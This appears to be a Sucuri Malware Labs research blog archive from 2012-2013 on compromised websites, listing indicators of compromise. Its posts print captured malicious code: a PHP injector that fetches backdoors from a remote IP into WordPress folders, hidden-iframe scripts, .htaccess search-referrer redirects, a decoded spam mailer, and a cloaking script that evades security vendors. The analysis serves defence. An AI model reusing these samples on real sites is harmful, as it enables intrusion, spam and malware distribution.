Sucuri Malware Labs

Backdoor Injector code

Published: 2013-05-16  by  Daniel B. Cid

A backdoor injector code we found on a compromised site: if(is__writable($dir."/wp-includes/")): file_put_contentz($dir.'/wp-includes/page.php', get_contentz('http://67.211.195.81/backdoorz/page.php')); touch($dir.'/wp-includes/page.php', $time); die(";;/wp-includes/page.php;;true_upload"); endif; if(is__writable($dir."/wp-content/themes/".get_settings('template')."/")){ file_put_contentz($dir.'/wp-content/themes/'.get_settings('template').'/timthumb.php', get_contentz('http://67.211.195.81/backdoorz/timthumb.php')); touch($dir.'/wp-content/themes/'.get_settings('template').'/timthumb.php', $time); die(";;/wp-content/themes/".get_settings('template')."/timthumb.php;;true_upload"); } if(is__writable($dir."/wp-admin/")): file_put_contentz($dir.'/wp-admin/options-plugin.php', get_contentz('http://67.211.195.81/backdoorz/wp-plugin.php')); touch($dir.'/wp-admin/options-plugin.php', $time); die(";;/wp-admin/options-plugin.php;;true_upload"); endif; if(is__writable($dir."/")): file_put_contentz($dir.'/wp-plugin.php', get_contentz('http://67.211.195.81/backdoorz/wp-plugin.php')); touch($dir.'/wp-plugin.php', $time); die(";;/wp-plugin.php;;true_upload"); endif; if(is__writable($dir."/wp-content/themes/")){ file_put_contentz($dir.'/wp-content/themes/theme.php', get_contentz('http://67.211.195.81/backdoorz/page.php')); touch($dir.'/wp-content/themes/theme.php', $time); die(";;/wp-content/themes/theme.php;;true_upload"); } if(is__writable($dir."/wp-content/uploads/")){ file_put_contentz($dir.'/wp-content/uploads/timthumb.php', get_contentz('http://67.211.195.81/backdoorz/timthumb.php')); touch($dir.'/wp-content/uploads/timthumb.php', $time); die(";;/wp-content/uploads/timthumb.php;;true_upload"); }else{ die(";;0;;false_upload");

It looks for a writable directly either inside wp-includes, wp-content or inside uploads to inject a backdoor.

Large scale TDS redirections

Published: 2013-02-15  by  Daniel B. Cid

Lots of compromised sites redirecting to TDS: http://1151.website.snafu.de/hkkj.html?h=1475928 http://adaptpro.co.uk/mwhi.html?h=1380448 http://aennekens.de/hozs.html?h=1180315 http://afamontserrat.org/zapn.html?h=877095 http://afhwarranty.us/wmcs.html?h=1235327 http://aklmn.com/mzos.html?h=1216229 http://alghuraba.co.uk/owes.html?h=1364764 http://app.2need.net/hwed.html?h=617164 http://appprices.com/heos.html?h=1168480 http://arlington9to5.com/mccf.html?h=423540 http://ashneh.in/zopn.html?h=841597 http://babylonproduction.com/wmcf.html?h=557620 http://badmintonscreensaver.com/ehai.html?h=1333181 http://bcitec.com/amms.html?h=1232317 http://belve.fr/wzai.html?h=1244948 http://belve.fr/wzpn.html?h=847683 http://bestofbec.com/hkgb.html?h=1507945 http://bestofbec.com/hmgn.html?h=809281 http://biggtimeinc.com/hfis.html http://bizwonk.com/zcei.html?h=1044231 http://blackfriday-shopping.com/mhhi.html?h=1366273 http://blackpooldesign.de/akkl.html?h=1476799 http://blamebilly.com/zhgu.html?h=992578 http://blamebilly.com/zhzs.html?h=1033872 http://blog.fantasygifts.com/ozaf.html?h=425793 http://bocaraton.isabellascott.com/hmmd.html?h=710618 http://bonadies.com.br/hezd.html?h=1449509 http://bornreadydesign.co.uk/eopu.html?h=1415104 http://buseklaw.com/mhai.html?h=1370845 http://busymomsfitness.org/mjpx.html?h=1507937 http://cdfusa.org/ahpn.html?h=846779 http://celeirodoalgarvio.com/azgn.html?h=856613 http://cib.onthewebhosting.eu/zwed.html?h=489754 http://cifraconsumibles.com/oczs.html?h=1149354 http://cinemamasti.com/edgv.html?h=960530 http://codeweb.cz/wmcf.html?h=719087 http://comfortconnectac.com/zwcd.html?h=965408 http://coverskin.ir/odpl.html?h=962581 http://crosbystreetgallery.com/emos.html?h=1244945 http://csplague.gen.tr/cwzi.html?h=1323098 http://dandbuniforms.com/hecd.html?h=595670 http://dandbuniforms.com/hegu.html?h=854117 http://darwinawards.fr/wami.html?h=1177610 http://dc5intent.com/wcoi.html?h=1163659 http://acme-parts.com/adbr.htm?h=968600 http://acme-parts.com/mdxr.htm?h=983583 http://africanmangoextract4u.com/maes.htm?h=1054006 http://agsolution.com/maes.htm?h=1054006 http://allroemenie.com/chci.htm?h=1154884 http://allroemenie.com/ocgu.htm?h=800432 http://asadbashir.com/aepn.htm?h=841168 http://asadbashir.com/hazi.htm?h=1110359 http://ashleeoakscommunity.com/maes.htm?h=1054006 http://ashleeoakscommunity.com/meci.htm?h=1097292 http://billsarena.com/adbr.htm?h=968600 http://blockoss.com/ocgu.htm?h=800432 http://crossmotion.com/maes.htm?h=1054006 http://crossmotion.com/meci.htm?h=1097292 http://decopersan.com/ccpu.htm?h=1414990 http://eewsonline.com/ccpu.htm?h=1414990 http://eewsonline.com/mhpu.htm?h=1415203 http://hazirlikkitap.com/maes.htm?h=1054006 http://iconmasonry.com/aeoi.htm?h=1118301 http://iconmasonry.com/hagn.htm?h=1397981 http://iconmasonry.com/maes.htm?h=1139554 http://pinnaclecoin.com/ocgu.htm?h=800432 http://termlifepolicys.com/occs.htm?h=1052123 http://tutsaksesli.com/meci.htm?h=1097292 http://vintagebelts.com/aeoi.htm?h=1033082 http://vintagebelts.com/megn.htm?h=836122 http://widetrader.com/aepn.htm?h=841168 http://widetrader.com/hazi.htm?h=1110359 http://widetrader.com/maes.htm?h=1054006 http://widetrader.com/wopu.htm?h=1410598 http://wilddogtraining.com/hazi.htm?h=1056691 http://wildearthfineart.com/eack.htm?h=749606

And that's just a small sample. We have detected just in February over 500 sites compromised exactly like that.

ChangeIP (dynamic DNS) malware

Published: 2012-12-10  by  Daniel B. Cid

If you look at the top domains distributing malware for the last days (and months), what do you see in common? #numberofsitesinfected #type #malwaredomain 650 iframe http://cvrtyi.ddns.info/nighttrend.cgi?8 315 iframe http://byiegfs.ddns.info/nighttrend.cgi?8 275 iframe http://ileshdg.qhigh.com/nighttrend.cgi?8 179 iframe http://sdcmd.freewww.info/nighttrend.cgi?8 159 iframe http://lmybv.ddns.name/nighttrend.cgi?8 148 iframe http://wstckewb.freewww.biz/nighttrend.cgi?8 146 iframe http://zqajsv.qhigh.com/nighttrend.cgi?8 126 iframe http://avvof.sellClassics.com/nighttrend.cgi?8 116 iframe http://wnevt.pcanywhere.net/nighttrend.cgi?8 101 iframe http://acijwfr.freewww.info/nighttrend.cgi?8 93 iframe http://cqcsk.ddns.name/facebook.cgi?8 84 iframe http://thcolxbbt.qhigh.com/facebook.cgi?8 77 iframe http://bwnzgtv.qhigh.com/facebook.cgi?8 74 iframe http://anmvmhz.ddns.info/facebook.cgi?8 73 iframe http://hbuwmx.myddns.com/facebook.cgi?8 72 iframe http://qizkfd.mynumber.org/facebook.cgi?8

Most of them are using a ChangeIP.com (dynamic DNS) sub domain as the first level of injection. Just check ddns.info, qhigh.com, mynumber.org, pcanywhere.net, etc, etc. They are all part of: http://www.changeip.com/. Just in the last 60 days, we identified more than 15,000 different sub domains from them being used to distribute malware.

Don't get us wrong, Dynamic DNS is a very useful service, but we would love if they would implement more serious filtering/blacklisting and some type of captcha to prevent their service from being abused by criminals.

However, in the current state, we can only recommend against using their service to avoid being thrown in the mix with the thousands of malicious domains that they host.

*If you look past 6 months ago, .co.cc was the main domain distributing malware, but since it was shut down, the attackers have migrated to changeip.com. Hopefully they will do something about it.

More Fake jQuery sites - jqueryc.com

Published: 2012-11-22  by  Daniel B. Cid

We keep seeing fake jQuery sites popping up and being used to distribute malware. One was jquerys.org, other was jquery-framework.com and the new one is jqueryc.com (199.59.241.179).

And this new one seems to be affecting many web sites in the last few days. All of them have the following on their header or index.php files:

window.top.location.href = "httx://www.jqueryc.com"

Which redirects any visitor to the web site to jqueryc.com where it is then sent to other random spammy domains (seems like a TDS is in place).

Update:We are also seeing some sites with this javascript file being included: http://www.jqueryc.com/jquery-1.6.3.min.js, which just redirects back to jqueryc.com via the same window.top.location.href in javascript.

*Note that the domain was just registered (20-nov-2012), so it is not being flagged anywhere.
**The official jquery sites are jquery.org or jquery.com. Other variations are likely fake.

co.cc seems to be gone

Published: 2012-11-20  by  Daniel B. Cid

It seems that the .co.cc (sub TLD) that used to be mass used by spammers and malware is now gone. Their registration page is offline:

$ host co.cc Host co.cc not found: 3(NXDOMAIN) $ host www.co.cc Host www.co.cc not found: 3(NXDOMAIN)

And we hope it stays that way.

Iframes generator: http://wordpresstest2.info/1.txt

Published: 2012-10-25  by  Daniel B. Cid

If your site is loading hidden iframes from *.ftp1.biz/pony, look for a curl or file_get_contents call to http://wordpresstest2.info/1.txt. When you visit this site, it generates random iframes:

http://lsghmr.ftp1.biz/pony ( 206.212.240.20) http://rchscbul.ftp1.biz/pony ( 206.212.240.20) http://idzui.ftp1.biz/pony http://vtfptnmxk.ftp1.biz/pony

That are displayed on the compromised sites.

Mass infections from fenwaywest.com/media/index.php

Published: 2012-10-11  by  Daniel B. Cid

We are seeing a large number of sites compromised with an iframe pointing to http://fenwaywest.com/media/index.php . Just in the last 3 days, we identified almost 10,000 sites with it:

2012/Oct/11 - 4393 sites - http://fenwaywest.com/media/index.php 2012/Oct/10 - 3117 sites - http://fenwaywest.com/media/index.php 2012/Oct/09 - 865 sites - http://fenwaywest.com/media/index.php

On all the compromised sites have the iframes similar to this one:

<script> function frmAdd() { var ifrm = document.createElement("iframe"); ifrm. style.position="absolute'; ifrm.style.top='-999em'; ifrm.style.left='-999em';  ifrm.src = "http://fenwaywest.com/media/index.php";ifrm.id = 'frmId';document.body. appendChild (ifrm);};window.onload = frmAdd;..

The domain is hosted at 50.28.53.157, but currently offline (redirecting to Google), so we can't really tell what it is doing. But on previous requests, it was redirecting to a TDS (traffic distribution system) and from there, being sent to multiple spam or malicious domains.

badgeplz.com Compromised

Published: 2012-10-04  by  Daniel B. Cid

Update 2012/Oct/12: Their site was fixed and is not loading malware anymore.

If you are using any widget/code from http://badgeplz.com/, remove it asap from your site. It has been compromised and is serving malicious code. So if you have any widget from there, it will be loaded from your site as well (blackhole exploit kit).

Example:

$ curl -D - http://badgeplz.com/instagram/?u=user <script>v="va"+"l";try{ebgserb++;}catc h(snregrx){try{(Math+"")()}catch(ztbet) {m= ..

Note only that, but their main site is compromised as well.

Iframes to redkit exploit kit

Published: 2012-09-12  by  Daniel B. Cid

A New batch of compromised sites are being infected with hidden iframes leading to the Redkit exploit kit. A site gets hacked and an iframe similar to this one is added: :

<iframe src="http://ad-d-to.com.br.ms:81/rem2.html..

Once that is loaded into the browser, it redirects anyone visiting the site to:

http://orcasp.com.br/43745180.html

Where it tries to make the browser load some malicious PDFs or Jar files:

<applet archive="http://orcasp.com.br/33256.jar".. <iframe src="http://orcasp.com.br/98765.pdf"..

And if you are running an outdated version of Java or Adobe PDF, your personal computer would get compromised as well.

Fake jquery site

Published: 2012-09-07  by  Daniel B. Cid

Seeing many sites with a fake jquery links on them from jquery-framework.com (just registered on 2012/08/05): :

<script src="httx://jquery-framework.com/jquery-1.7.1.js..

If you use jquery, make sure to link to reliable sources (either jquery.org or googleapis). This one is redirecting users to http://browser-31.com/s/3013.

Rebots.php on WordPress

Published: 2012-09-04  by  Daniel B. Cid

We are seeing a new batch of the "rebots.php" infections on WordPress and one thing is intriguing us. On many sites we are analysing, WordPress is updated and no suspicious backdoors or plugins were found. All in order, except for the javascript injected inside the theme.

The only thing in common on them is a single login to wp-admin, followed by a visit to wp-admin/theme-editor.php to modify the theme:

184.22.164.xx - - [29/Aug/2012:21:03:02 -0300] "POST ///wp-login.php HTTP/1.1" 302 - "-" "" 184.22.164.xx - - [29/Aug/2012:21:03:13 -0300] "POST //wp-admin/theme-editor.php HTTP/1.1" 302 - "-" "" 184.22.164.xx - - [22/Aug/2012:21:03:16 -0300] "GET //wp-admin//theme-editor.php?file=index.php&theme=classic&scrollto=0&updated=true HTTP/1.1" 200 58188 "-" ""

So it seems someone was able to steal the wp-admin password and edit the theme. It was done automatically, since no CSS or .JS files were loaded.

Another intereting issue is that on some of these sites, we didn't identify any brute force attack trying to guess the passwords. Just this single login.

Since we don't know how these passwords got stolen, we recommend people to change their wp-admin passwords asap until we have more info (specially if you have been compromised with the rebots.php injection).

Server-wide iframe injections

Published: 2012-08-14  by  Daniel B. Cid

Dennis (from unmask) posted about some iframe injections that he has been seeing lately: RFI: Server-wide iframe injections.

The post is interesting, so read that first. We are also seeing many variations of this attack, always with the iframes being injected as domain.com/[randomnumbers].html and redirecting the user to Fake AV. This are some of the URLs we are seeing:

15 http://tiergefluester.ch/37624443.html 8 http://qmg2.com/96344443.html 6 http://52943578.nl.strato-hosting.eu/49404443.html 5 http://nw-transporte.de/31374443.html 4 http://soka.saitama-eastern.jp/68844443.html 3 http://tvhr9.com/59304443.html 3 http://tvhr9.com/48204443.html 3 http://tijerasycosmetica.es/32154443.html 3 http://sepatch.org/74734443.html 3 http://qmg2.com/51204443.html 3 http://photopassion34.eu/84364443.html 2 http://sipsnstrokesstudios.com/90144443.html 2 http://relance-clients.com/18304443.html 2 http://langaz.pl/28074443.html 2 http://kopian.net.pl/10344443.html 2 http://huskiesfootball.ca/54924443.html 2 http://humourr.com/77204443.html 2 http://fam-vandenberg.nl/33604443.html 2 http://dev.look-whos-talking.co.uk/75584443.html 2 http://cadeauxentreprise.ca/40104443.html 1 http://www.sportman.nl/44554443.html 1 http://vanaden.nl/76644443.html 1 http://tvhr9.com/92824443.html 1 http://tvhr9.com/15374443.html 1 http://tijerasycosmetica.es/68134443.html 1 http://tiergefluester.ch/71834443.html 1 http://tiergefluester.ch/47254443.html 1 http://thomasvillefurnishings.ca/66124443.html 1 http://soka.saitama-eastern.jp/76924443.html 1 http://soka.saitama-eastern.jp/31164443.html 1 http://sipsnstrokesstudios.com/82464443.html 1 http://shopmassive.com/72534443.html 1 http://shopmassive.com/60754443.html 1 http://shopmassive.com/50284443.html 1 http://sepatch.org/58814443.html 1 http://sepatch.org/35224443.html 1 http://sepatch.org/14244443.html 1 http://santeayurveda.com/48804443.html 1 http://sacem.com.tr/95534443.html 1 http://s1050444.iie.nl/76384443.html 1 http://roswitha-jacobi.de/67874443.html 1 http://roswitha-jacobi.de/52194443.html 1 http://roswitha-jacobi.de/22914443.html 1 http://roswitha-jacobi.de/15584443.html 1 http://reisendefamilie.net/70004443.html 1 http://rectol.com/76084443.html 1 http://rectol.com/11154443.html 1 http://radiocanvas.co.uk/97984443.html 1 http://qmg2.com/82474443.html 1 http://qmg2.com/76574443.html 1 http://qmg2.com/74054443.html 1 http://qmg2.com/34794443.html 1 http://qmg2.com/20054443.html 1 http://qmg2.com/14934443.html 1 http://pohlgruppe.de/89314443.html 1 http://pohlgruppe.de/73684443.html 1 http://photopassion34.eu/93154443.html 1 http://photopassion34.eu/35484443.html 1 http://ozturannakliyat.com/94564443.html 1 http://opracowaniagraficzne.pl/10474443.html 1 http://nw-transporte.de/96284443.html 1 http://mukogawa.jp/98984443.html 1 http://moodle.fortpointdesign.com/31844443.html 1 http://missweekderbesten.nl/12714443.html 1 http://lojastelefrio.com.br/18854443.html 1 http://linkeddoc.com/31974443.html 1 http://langaz.pl/16524443.html 1 http://kulycap.fr/63464443.html 1 http://kopian.net.pl/69004443.html .. many many more ...

Note that all (or most) of these sites are compromised and being used by the attackers to spread malware "botnet" style. Dennis also questioned how are these sites being hacked.

Initially, all of them were running Plesk (at least I could access it as site.com:8443). However, as the infection is growing, I am seeing many sites not using Plesk with this type of malware, so we can't know for sure. We assume it is a mix of attacks (brute force FTP + outdated Plesk + anything they can find).

Fake AV redirections .ru -> .pl

Published: 2012-08-02  by  Daniel B. Cid

We posted yesterday about the Blackmuscats .htaccess redirection that was affecting thousands of web sites.

They are still happening (and growing), but the attackers decided to switch names to "nonalco", "mimosa" and other random keywords for their files:

1251 redirections http://fitnes-corp.ru/shurimuri?5 1093 redirections http://infofitnes.ru/interactive?5 818 redirections http://fitnes-company.ru/interactive?5 817 redirections http://mir-fitnes.ru/interactive?5 802 redirections http://info-fitnes.ru/interactive?5 788 redirections http://fitnescompany.ru/interactive?5 268 redirections http://fitnes-corp.ru/shurimuri?5 220 redirections http://infofitnes.ru/interactive?5 188 redirections http://cofitnes.ru/mimosa?5 177 redirections http://mir-fitnes.ru/interactive?5 168 redirections http://fitnes-company.ru/interactive?5 165 redirections http://info-fitnes.ru/interactive?5 162 redirections http://fitnescompany.ru/interactive?5 79 redirections http://fitnescorp.ru/shurimuri?5 40 redirections http://nashfitnes.ru/nonalco?5 37 redirections http://cofitnes.ru/mimosa?5 1191 redirections http://nashfitnes.ru/nonalco?5 981 redirections http://nash-fitnes.ru/nonalco?5 953 redirections http://supasweb.ru/blackmuscats?5 920 redirections http://nashifitnes.ru/nonalco?5 895 redirections http://nashafitnes.ru/nonalco?5 878 redirections http://nasha-fitnes.ru/nonalco?5 555 redirections http://fitnes-ltd.ru/shurimuri?5 261 redirections http://nashfitnes.ru/nonalco?5 208 redirections http://supasweb.ru/blackmuscats?5 199 redirections http://nash-fitnes.ru/nonalco?5 190 redirections http://nashafitnes.ru/nonalco?5 189 redirections http://nashifitnes.ru/nonalco?5 180 redirections http://nasha-fitnes.ru/nonalco?5 116 redirections http://fitnes-ltd.ru/shurimuri?5

The redirection is still the same, going from those .ru domains, to additional second level .ru domains and them to a .pl:

http://russian-fitnes.ru/prunus/cerasus.php http://www1.vulnerabilitytoolssolver.pl/18o8e9/al/1fedfba29dd0193d/pr2/0/ http://www1.antivirusworrydanger.pl/370l3591/al/1fedfba29dd0193d/pr2/0/ http://minimizerprocessesdebugger.pl/b6l1s/al/78dee9e271084cb2/pr2/238/ http://www1.stabilityprotectionscanner.pl/n9044s5/al/1fedfba29dd0193d/pr2/0/

So far we have identified more than 17,000 sites with this type of malware. More details as we track them.

Strange Malware from cdnexit.com

Published: 2012-07-27  by  Daniel B. Cid

We are seeing thousands of sites compromised with an iframe from cndexit.com:

This is the iframe that we detected:

http://cdn.cdnexit.com/Home/detect/index.php

Google has already flagged this domain and found it to be responsible for the infection of more than 1.5k sites:

Has this site acted as an intermediary resulting in further distribution of malware? Over the past 90 days, cdnexit.com appeared to function as an intermediary for the infection of 1509 site(s) including txt.ir/, remedios-naturais.com/, pornupload.com/.

We can't say for sure how sites got hacked, but we will post more details when we have them. If your site is compromised, our team can clean it for you: http://sucuri.net/signup

Yahoo Leak

Published: 2012-07-12  by  Daniel B. Cid

You can check if your email is part of the yahoo leak here: http://labs.sucuri.net/?yahooleak.

Your know there is a vulnerability in Plesk when..

Published: 2012-07-09  by  Daniel B. Cid

This is a simple way to know when a vulnerability in Plesk (or any other software) is being exploited in the wild:



When the mass scans for it starts. The data is from ISC (isc.sans.org) and shows a massive increase in the number of queries for port 8443 (used by Plesk).

Top malware entry stats.php

Published: 2012-07-08  by  Daniel B. Cid

Top malware entry for the day: poseyhumane.org/stats.php

<iframe src="http://poseyhumane.org/stats.php" name="Twitter"..  scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>

It seems to be the stats.php "malware" of the day. Related to our post here: Distributed Malware Network Outbreak Using Stats.php.

We also identified a CC (command and control server) for these infections: http://botstatisticupdate.com/stat/stat.php. More info to come soon.

Strange .htaccess redirections to google.com

Published: 2012-07-02  by  Daniel B. Cid

A few weeks ago we reported the case of a few compromised sites with an .htaccess redirection to msn.com. Now we are seeing a few sites with the same redirection but to google.com.

This is what we are seeing on some hacked sites (.htaccess file):

RewriteEngine On RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|youtube|wikipedia|excite|altavista|msn|aol|goto|infoseek|lycos|search|bing|dogpile|facebook|twitter|live|myspace|linkedin|flickr)\.(.*) RewriteRule ^(.*)$ http://google.com [R=301,L] .. lots of empty lines/ white spaces ... ErrorDocument 404 http://google.com

We have no idea why this hapening. Maybe a bug in the attackers malware injection code, but we can't say for sure. We will post more details when we find out what is going on.

PHP Spam tool (UnixStats Mass MaiLer)

Published: 2012-06-28  by  Daniel B. Cid

While looking at a compromised site, we found an interesting mass mailer in there. The content was encoded using eval/gzinflate and base64_decode:

<?php eval(gzinflate(base64_decode("1RprcxM58jtV/AehyyZ2rcdjOwkb7NjAhrBLFQGWhLvbAio1npFtLfNC.....

But when switching the "eval" for "print" we could see the mass mailer hidden and what it was doing:

$secure = "racrewmania@googlemail.com"; @$action=$_POST['action']; @$from=$_POST['from']; @$realname=$_POST['realname']; @$replyto=$_POST['replyto']; @$subject=$_POST['subject']; @$message=$_POST['message']; @$emaillist=$_POST['emaillist']; @$file_name=$_FILES['file']['name']; @$contenttype=$_POST['contenttype']; @$file=$_FILES['file']['tmp_name']; @$amount=$_POST['amount']; set_time_limit(intval($_POST['timelimit'])); .. <title>UnixStats Mass MaiLer</title> .. for($xx=0; $xx<$amount; $xx++){ for($x=0; $x<$numemails; $x++){ $to = $allemails[$x]; if ($to){ $to = ereg_replace(" ", "", $to); $message = ereg_replace("&email&", $to, $message); $subject = ereg_replace("&email&", $to, $subject); print "Sending mail to $to......."; flush(); $header = "From: $realname <$from>\r\nReply-To: $replyto\r\n"; $header .= "MIME-Version: 1.0\r\n"; If ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uid\r\n"; If ($file_name) $header .= "--$uid\r\n"; $header .= "Content-Type: text/$contenttype\r\n"; $header .= "Content-Transfer-Encoding: 8bit\r\n\r\n"; $header .= "$message\r\n"; If ($file_name) $header .= "--$uid\r\n"; If ($file_name) $header .= "Content-Type: $file_type; name=\"$file_name\"\r\n"; If ($file_name) $header .= "Content-Transfer-Encoding: base64\r\n"; If ($file_name) $header .= "Content-Disposition: attachment; filename=\"$file_name\"\r\n\r\n"; If ($file_name) $header .= "$content\r\n"; If ($file_name) $header .= "--$uid--"; mail($to, $subject, "", $header); print "ok<br>"; flush(); } } } mail($secure, $filter, $emaillist, $float);

What I found interesting is that this spam tool stored all the emails in the database and the script supported options to update the email list, change content and many things like that. And every few hours the attackers would access it, update the emails and spam everyone in there.

Flagging google.com as malware

Published: 2012-06-21  by  Daniel B. Cid

Yesterday we listed www.google.com as being used for .htaccess conditional redirections on hacked sites. Google does no evil, so what happened?

We identified the source of the malware, which looks for certain user agents and IP addresses and redirects to www.google.com if it comes from them or to the real malware if not.

This is the code:

$is_bot = FALSE ; $user_agent_to_filter = array( '#Ask\s*Jeeves#i', '#HP\s*Web\s*PrintSmart#i', '#Safari#i', '#HTTrack#i', '#Chrome#i', '#Mac#i', '#IDBot#i', '#Indy\s*Library#', '#ListChecker#i', '#libwww-perl#i', '#Lupa\.ru#i', '#LWP::Simple#i', '#lwp-trivial#i', '#Missigua#i', '#MJ12bot#i', .. '#msnbot#i', '#msnbot-media#i', '#Offline\s*Explorer#i', '#OmniExplorer_Bot#i', '#webcrawler#i', '#robozill#i', '#gulliver#i', '#architextspider#i', '#yahoo!\s*slurp#i', '#charlotte#i', '#ngb#i' ) ; $stop_ips_masks = array( "66\.249\.[6-9][0-9]\.[0-9]+", // Google NetRange: 66.249.64.0 - 66.249.95.255 "74\.125\.[0-9]+\.[0-9]+", // Google NetRange: 74.125.0.0 - 74.125.255.255 "65\.5[2-5]\.[0-9]+\.[0-9]+", // MSN NetRange: 65.52.0.0 - 65.55.255.255, "74\.6\.[0-9]+\.[0-9]+", // Yahoo NetRange: 74.6.0.0 - 74.6.255.255 "67\.195\.[0-9]+\.[0-9]+", // Yahoo#2 NetRange: 67.195.0.0 - 67.195.255.255 "72\.30\.[0-9]+\.[0-9]+", // Yahoo#3 NetRange: 72.30.0.0 - 72.30.255.255 "38\.[0-9]+\.[0-9]+\.[0-9]+", // Cuill: NetRange: 38.0.0.0 - 38.255.255.255 "93\.172\.94\.227", // MacFinder "212\.100\.250\.218", // Wells Search II "71\.165\.223\.134", "70\.91\.180\.25", "65\.93\.62\.242", "74\.193\.246\.129", "193\.164\.202\.166", "213\.144\.15\.38", "195\.92\.229\.2", "70\.50\.189\.191", "218\.28\.88\.99", "165\.160\.2\.20", "89\.122\.224\.230", "66\.230\.175\.124", "218\.18\.174\.27", "65\.33\.87\.94", "67\.210\.111\.241", "81\.135\.175\.70", "64\.69\.34\.134", "89\.149\.253\.169", "77\.193\.236\.225", "84\.155\.170\.196", "69\.174\.58\.36", "128\.103\.64\.[0-9]+", // StopBadWare "150\.70\.[0-9]+\.[0-9]+", // TrendMicro "216\.104\.[0-9]+\.[0-9]+", // TrendMicro "207\.46\.[0-9]+\.[0-9]+", // Microsoft "157\.55\.[0-9]+\.[0-9]+", // Microsoft "213\.180\.[0-9]+\.[0-9]+", // Yandex "217\.23\.[0-9]+\.[0-9]+", // Kaspersky "91\.103\.64\.[0-9]+", // Kaspersky "215\.5\.80\.[0-9]+", // Kaspersky "195\.168\.53\.[0-9]+", // NOD32 "117\.198\.48\.54", "110\.77\.248\.135", "87\.255\.51\.229", "206\.248\.243\.130", "124\.115\.6\.[0-9]+", "170\.252\.248\.[0-9]+", "217\.95\.225\.[0-9]+", "203\.17\.34\.[0-9]+", "220\.255\.1\.[0-9]+", // domain-tool.com "69\.28\.58\.[0-9]+", // Symantec "66\.231\.252\.[0-9]+", "126\.15\.99\.[0-9]+", "209\.128\.28\.[0-9]+", "91\.32\.55\.[0-9]+", "208\.72\.12\.[0-9]+", "84\.136\.88\.[0-9]+", "206\.80\.114\.[0-9]+", "24\.4\.75\.135", "66\.147\.244\.[0-9]+", // freepcsecurity.co.uk "128\.111\.48\.[0-9]+", // wepawet.cs.ucsb.edu "209\.9\.239\.[0-9]+", // jsunpack.jeek.org "62\.67\.194\.[0-9]+", // support.clean-mx.de "195\.214\.79\.[0-9]+", // support.clean-mx.de "97\.74\.141\.[0-9]+", // malwareurl.com "213\.171\.194\.[0-9]+", // spamhaus "139\.146\.167\.[0-9]+", // malwaredomains "88\.160\.229\.[0-9]+", // malwaredomains "69\.162\.79\.[0-9]+", // malwarebytes "66\.40\.145\.[0-9]+", // bitdefender "66\.223\.50\.[0-9]+", // bitdefender "204\.14\.90\.[0-9]+", // spywarewarrior.com "92\.123\.155\.[0-9]+", // Sophos "213\.31\.172\.[0-9]+", // Sophos "143\.215\.130\.[0-9]+", // Malwaredomainlist "150\.70\.172\.[0-9]+", // TrendNet "64\.88\.164\.[0-9]+", // AVG "102\.157\.192\.[0-9]+", // ZeusTracker "109\.65\.41\.[0-9]+", // ZeusTracker "110\.77\.248\.[0-9]+", // Virustotal "59\.6\.145\.[0-9]+", // Virustotal "67\.124\.37\.[0-9]+", // Virustotal "80\.190\.117\.[0-9]+", // Virustotal "202\.190\.74\.[0-9]+", // Virustotal "209\.160\.33\.[0-9]+", // Virustotal "91\.121\.139\.[0-9]+", // Virustotal "85\.87\.104\.[0-9]+", // Virustotal "96\.50\.0\.[0-9]+", // Virustotal "220\.225\.0\.52" ); foreach ( $stop_ips_masks as $k=>$v ) { if ( preg_match( '#^'.$v.'$#', $_SERVER['REMOTE_ADDR']) ) $is_bot = TRUE ; } if ( $is_bot || !( FALSE === strpos( preg_replace( $user_agent_to_filter, '-NO-WAY-', $_SERVER['HTTP_USER_AGENT'] ), '-NO-WAY-' ) ) ) { header("Location: http://www.google.com/"); die(); }

So, if you are not familiar with PHP, what this code is doing is checking for the user agent of some bots (Googlebot, MSN, Bing, etc) and for a few IP addresses for bots and anti virus companies (Trend, Bitdefender, etc). If the requests are coming from them, they ignore the connection and redirect to www.google.com.

That's why we were seeing www.google.com and listed it on our malware dump (already fixed).

For all the other users (the victims), the malware was contacting http://88.198.28.38/api.php?action=link to get the URL to redirect (generally in the .tk domain). Any questions, let us know.

Strange .htaccess redirections to msn.com

Published: 2012-06-18  by  Daniel B. Cid

We are seeing something very strange on a few compromised sites lately. Instead of doing .htaccess redirections to malware sites, the attackers added the "malware" to redirect users to msn.com.

This is what we are seeing on some hacked sites (.htaccess file):

RewriteEngine On RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|youtube|wikipedia|excite|altavista|msn|aol|goto|infoseek|lycos|search|bing|dogpile|facebook|twitter|live|myspace|linkedin|flickr)\.(.*) RewriteRule ^(.*)$ http://msn.com [R=301,L] .. lots of empty lines/ white spaces ... ErrorDocument 404 http://msn.com

If you are not familiar with the .htaccess syntax, it is basically redirecting any users coming from search engines (Google, Bing, Yahoo and even Twitter/Facebook) to msn.com instead of going to the real site.

Anyone have ideas? It seems like a bug in the attackers malware injection code, but we can't say for sure. And no, we do not think Microsoft is behind those (conspiracy theory). :)

Malware from thesea.org/media.php

Published: 2012-06-11  by  Daniel B. Cid

We are seeing many sites compromised with malware from thesea.org/media.php. All sites had the following added to the .htaccess file:

RewriteEngine On RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|about|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|blog|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditireland|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|galaxy|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmas